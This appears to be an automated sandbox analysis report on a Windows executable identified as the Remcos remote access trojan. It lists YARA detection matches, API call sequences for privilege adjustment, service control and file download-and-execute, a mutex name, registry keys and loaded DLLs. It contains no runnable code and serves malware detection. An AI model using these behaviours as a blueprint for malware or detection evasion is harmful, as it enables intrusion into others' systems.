Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle | 0_2_0041BB9A
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress | 0_2_004167EF
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043706A | 0_2_0043706A
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00414005 | 0_2_00414005
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043E11C | 0_2_0043E11C
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004541D9 | 0_2_004541D9
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004381E8 | 0_2_004381E8
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041F18B | 0_2_0041F18B
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00446270 | 0_2_00446270
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043E34B | 0_2_0043E34B
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004533AB | 0_2_004533AB
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0042742E | 0_2_0042742E
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00437566 | 0_2_00437566
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043E5A8 | 0_2_0043E5A8
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004387F0 | 0_2_004387F0
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043797E | 0_2_0043797E
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004339D7 | 0_2_004339D7
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0044DA49 | 0_2_0044DA49
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00427AD7 | 0_2_00427AD7
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041DBF3 | 0_2_0041DBF3
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00427C40 | 0_2_00427C40
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00437DB3 | 0_2_00437DB3
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00435EEB | 0_2_00435EEB
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0043DEED | 0_2_0043DEED
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00426E9F | 0_2_00426E9F
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: String function: 00401E65 appears 35 times
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: String function: 00434E70 appears 54 times
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: String function: 00434801 appears 42 times
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | type: SAMPLE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp | type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp | type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000 | type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError | 0_2_0041798D
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle | 0_2_0040F4AF
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource | 0_2_0041B539
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 0_2_0041AADB
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-8AGIM5
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Software\ | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Rmc-8AGIM5 | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Exe | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Exe | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Rmc-8AGIM5 | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: (TG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: ,aF | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Inj | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Inj | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: RG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: RG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: RG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: HSG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: RG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: exepath | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: ,aF | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: HSG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: exepath | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: RG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: licence | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: tMG | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: pd | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: Administrator | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: User | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: del | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: del | 0_2_0040EA00
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Command line argument: del | 0_2_0040EA00
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | ReversingLabs: Detection: 86%
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Virustotal: Detection: 86%
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 0_2_0041CBE1
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00457186 push ecx; ret | 0_2_00457199
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00457AA8 push eax; ret | 0_2_00457AC6
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00434EB6 push ecx; ret | 0_2_00434EC9
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00406EEB ShellExecuteW,URLDownloadToFileW | 0_2_00406EEB
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 0_2_0041AADB
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 0_2_0041CBE1
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040F7E2 Sleep,ExitProcess,0_2_0040F7E2
